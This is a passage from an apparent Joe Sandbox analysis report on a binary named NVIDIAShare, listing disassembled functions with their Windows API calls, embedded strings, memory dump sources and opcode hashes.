Opcode ID: f98c2519891f6ffa1db06158ead117b78a189c56f67a1307969db595f9bacc7e
Instruction ID: cf22fffd97cf6ec76734889ef236c0dfa12372b9c171a01b559e565830542d4a
Opcode Fuzzy Hash: f98c2519891f6ffa1db06158ead117b78a189c56f67a1307969db595f9bacc7e
Instruction Fuzzy Hash: 3C31A275A04229EFDB61DF99D880D9EBBFCEF99310F1080ABF98497210D6759A40CB51

Function 010231D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 010231FB
_abort.LIBCMT ref: 01023306

Strings

MOC, xrefs: 0102320D
RCC, xrefs: 01023215

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: 9991bcedfb5ba944ca20776345c51734571332bf0aff8fd387d73a6e3577be4e
Instruction ID: c858d9e6591e3be99bb352e16ecf85288f4dd1bef9b27f5543531d9304656829
Opcode Fuzzy Hash: 9991bcedfb5ba944ca20776345c51734571332bf0aff8fd387d73a6e3577be4e
Instruction Fuzzy Hash: A7418D71900229AFDF16DF98CC81AEEBBB5FF09304F188099FA446B211D339E950DB50

Function 01007401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01007406

Part of subcall function 01003BBA: __EH_prolog.LIBCMT ref: 01003BBF

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 010074CD

Part of subcall function 01007A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 01007AAB
Part of subcall function 01007A9C: GetLastError.KERNEL32 ref: 01007AF1
Part of subcall function 01007A9C: CloseHandle.KERNEL32(?), ref: 01007B00

Strings

SeRestorePrivilege, xrefs: 01007460
SeSecurityPrivilege, xrefs: 0100744B

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 2b78e14c86bcfce8256ce7ae79a54d657d33c495778037f924c0f34688ae90e7
Instruction ID: 6f04a2c1c482d9154cff54d49baf06ef2644776e36e69643ee98bc2ddebb20c5
Opcode Fuzzy Hash: 2b78e14c86bcfce8256ce7ae79a54d657d33c495778037f924c0f34688ae90e7
Instruction Fuzzy Hash: 5731D671E00259AAFF63EBA8CC44BEE7BA9BF55300F044055E5C5AB1C1CBB9A984C761

Function 0101AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370

EndDialog.USER32(?,00000001), ref: 0101AD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0101ADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 0101ADC2

Strings

ASKNEXTVOL, xrefs: 0101AD28

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: a9525abd271ca87f4d914b22a003b4b4bc751f2406a0cd9fce8c509dc002820c
Instruction ID: 94bc755e958b0fdd24a033ed09095d4b0464aa2dc4a6026eed6cd84fb23f48e5
Opcode Fuzzy Hash: a9525abd271ca87f4d914b22a003b4b4bc751f2406a0cd9fce8c509dc002820c
Instruction Fuzzy Hash: 5011B132345641FFE262AF6CDC45FAA7BA9EB4A752F800044F2C2DB0ACC77B94059721

Function 0100D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0100D954
_strncpy.LIBCMT ref: 0100D99A

Part of subcall function 01011DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,01041030,00000200,0100D928,00000000,?,00000050,01041030), ref: 01011DC4

Strings

@%s, xrefs: 0100D93E
$%s, xrefs: 0100D949

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: 7ca9fca125aab86798e96f28070bd920c222cb15f092ddd28ea1776cdc1b49b5
Instruction ID: 31def597853391b9143afd0f81739381f4809b5670d312a1ccd3346a033f7f1a
Opcode Fuzzy Hash: 7ca9fca125aab86798e96f28070bd920c222cb15f092ddd28ea1776cdc1b49b5
Instruction Fuzzy Hash: 3321D532800648AEFB22EEE8CC41FDE3BE9BF01300F040516FA909A1D1E332D249CB61

Function 01010E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0100AC5A,00000008,?,00000000,?,0100D22D,?,00000000), ref: 01010E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0100AC5A,00000008,?,00000000,?,0100D22D,?,00000000), ref: 01010E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0100AC5A,00000008,?,00000000,?,0100D22D,?,00000000), ref: 01010E9F

Strings

Thread pool initialization failed., xrefs: 01010EB7

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 7f34a4e5cfc6d33f48118ab8da79ed0509bfe8c3620a1aaf27b64783884c3925
Instruction ID: da2b9517c12fdba17235caf7bda789cfad4f18e756de8c845cd89ed6d4cb695c
Opcode Fuzzy Hash: 7f34a4e5cfc6d33f48118ab8da79ed0509bfe8c3620a1aaf27b64783884c3925
Instruction Fuzzy Hash: 251151B16407099FD3314F6B98849A7FBECFB65754F14482EF1DAC6204D6B659808B50

Function 0101B270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370

EndDialog.USER32(?,00000001), ref: 0101B2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0101B2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 0101B304

Strings

GETPASSWORD1, xrefs: 0101B289

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: 54a9b1b3c6ffad30263a138ffa0d1418e5df188ccd07da384aab28c917c4c374
Instruction ID: 90168126a2390076cb5a9fa0461ac914f159448eabecc3f165c506425d23e3c1
Opcode Fuzzy Hash: 54a9b1b3c6ffad30263a138ffa0d1418e5df188ccd07da384aab28c917c4c374
Instruction Fuzzy Hash: E0110832900115B7EB629A689D49FFF7BBCFF59700F004050FAC5F60C8C7A9A91987A1

Function 0101DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 0101DD1C, 0101DD50
RENAMEDLG, xrefs: 0101DD31

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 403203eb5b5d5608aec34c41f773c0d57d40c16a6a7daddeda83fe341a8446e6
Instruction ID: a9b5f280b4583966a2c437509cd04fa4607b2dc3464208648edfb99c05be1b8c
Opcode Fuzzy Hash: 403203eb5b5d5608aec34c41f773c0d57d40c16a6a7daddeda83fe341a8446e6
Instruction Fuzzy Hash: 6301F5B9604244AFD730AED8FD8899A7FA8F748340B00482AF5C5C3228C73ED850DBA0

Function 01029A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 01029AA9
__alldvrm.LIBCMT ref: 01029CAA
__alldvrm.LIBCMT ref: 01029CCC

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
Instruction ID: cf92f794dcef4a994ff41bcbf41fdddc51641b6d8b2ae45c24af45c74368076a
Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
Instruction Fuzzy Hash: 5BA129729043BA9FEB26CF18C8917AEBFE5EF55318F2841ADD9C59B281C2398941C750

Function 0100A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,01007F69,?,?,?), ref: 0100A3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,01007F69,?), ref: 0100A43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,01007F69,?,?,?,?,?,?,?), ref: 0100A4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,01007F69,?,?,?,?,?,?,?,?,?,?), ref: 0100A4C6

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 4f6ac1af2a0118dd9921621cc8f9bb45d9dba1c197abcf4cc11a6392a6b8f2cc
Instruction ID: 020702c7db62fd5d77cef9a6f518e718593e5a6ad10676109ccb3f7a767d3cb5
Opcode Fuzzy Hash: 4f6ac1af2a0118dd9921621cc8f9bb45d9dba1c197abcf4cc11a6392a6b8f2cc
Instruction Fuzzy Hash: E841AF312483819AF732DE28DC55FEFBBE8AB85700F04495DB6D1D71C0DAB89A48DB52

Function 01001100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0100112B
_wcslen.LIBCMT ref: 01001153
_wcslen.LIBCMT ref: 01001182
_wcslen.LIBCMT ref: 010011A9

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: cce129f31006e27da8112d56d0a1eda3a571ded943039947c7734ebb97adca33
Instruction ID: eec721f06f1dd6a54d9e524834f1e9bb5871a12db14cbfb8629f86163a5f8cbc
Opcode Fuzzy Hash: cce129f31006e27da8112d56d0a1eda3a571ded943039947c7734ebb97adca33
Instruction Fuzzy Hash: 5D41B7719006669BDB219F688C559DE7BB8EF14310F000059F9C9F7289DB34ED598BE0

Function 0102C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,010291E0,?,00000000,?,00000001,?,?,00000001,010291E0,?), ref: 0102C9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0102CA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,01026CBE,?), ref: 0102CA70
__freea.LIBCMT ref: 0102CA79

Part of subcall function 01028E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0102CA2C,00000000,?,01026CBE,?,00000008,?,010291E0,?,?,?), ref: 01028E38

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 56d0f153d39c0cb905f29f7f6a6b761015d4236384a408c17edb643204b09080
Instruction ID: ed2d6f2d6174f20c8c28b3809acced4443dd2bf137096f88a7eb9ee66b5ae090
Opcode Fuzzy Hash: 56d0f153d39c0cb905f29f7f6a6b761015d4236384a408c17edb643204b09080
Instruction Fuzzy Hash: 5131C172A0022AABEF25CF68DC85DFE7BA5EF41714B0442A8EC84E7250E735DD54CB90

Function 0101A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0101A666
GetDeviceCaps.GDI32(00000000,00000058), ref: 0101A675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0101A683
ReleaseDC.USER32(00000000,00000000), ref: 0101A691

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 45aa8b72bd48f80fb49a7a90c306cf52de2bd15b1b30a36fb3ee21c4f5a42c14
Instruction ID: 579ba39f9111fb4198bb62cc15749197ef82f3556b60e6f15499c4ba8277be48
Opcode Fuzzy Hash: 45aa8b72bd48f80fb49a7a90c306cf52de2bd15b1b30a36fb3ee21c4f5a42c14
Instruction Fuzzy Hash: A7E08C31A42720FBE2701BA0A91DB8B3E94BB05B52F004505FF899A188DB7E80088BE0

Function 0101A80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 0101A699: GetDC.USER32(00000000), ref: 0101A69D
Part of subcall function 0101A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0101A6A8
Part of subcall function 0101A699: ReleaseDC.USER32(00000000,00000000), ref: 0101A6B3

GetObjectW.GDI32(?,00000018,?), ref: 0101A83C

Part of subcall function 0101AAC9: GetDC.USER32(00000000), ref: 0101AAD2
Part of subcall function 0101AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0101AB01
Part of subcall function 0101AAC9: ReleaseDC.USER32(00000000,?), ref: 0101AB99

Strings

(, xrefs: 0101A9AA

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 1f69a9f1103e0cd4ab5dd2d00f1819c5b0c22e4572efacf221fc78cb962b5a18
Instruction ID: dc3842d6006a8fa5fabe1f3ddbb26c5507f551926b0bdd9edbcccf53d03fea8b
Opcode Fuzzy Hash: 1f69a9f1103e0cd4ab5dd2d00f1819c5b0c22e4572efacf221fc78cb962b5a18
Instruction Fuzzy Hash: A191F371604380EFD720DF25C884A2BBBE8FFC9611F00495EF99AD7225DB35A845CB62

Function 0102B1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0102B324

Part of subcall function 01029097: IsProcessorFeaturePresent.KERNEL32(00000017,01029086,00000050,01033A34,?,0100D710,00000004,01041030,?,?,01029093,00000000,00000000,00000000,00000000,00000000), ref: 01029099
Part of subcall function 01029097: GetCurrentProcess.KERNEL32(C0000417,01033A34,00000050,01041030), ref: 010290BB
Part of subcall function 01029097: TerminateProcess.KERNEL32(00000000), ref: 010290C2

Strings

*?, xrefs: 0102B1FB
., xrefs: 0102B4DB

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
Instruction ID: 404f55a7778ee7622342f99f5da2bd885d2ed220bac62a7c44004ab7a9eb5aa1
Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
Instruction Fuzzy Hash: ED519471E0022A9FDF15DFA8C880AEDBBF5FF59314F2481A9D894E7341E6359A05CB50

Function 010075DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 010075E3

Part of subcall function 010105DA: _wcslen.LIBCMT ref: 010105E0

Part of subcall function 0100A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0100A598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0100777F

Part of subcall function 0100A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A501
Part of subcall function 0100A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A532

Strings

:, xrefs: 01007654

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

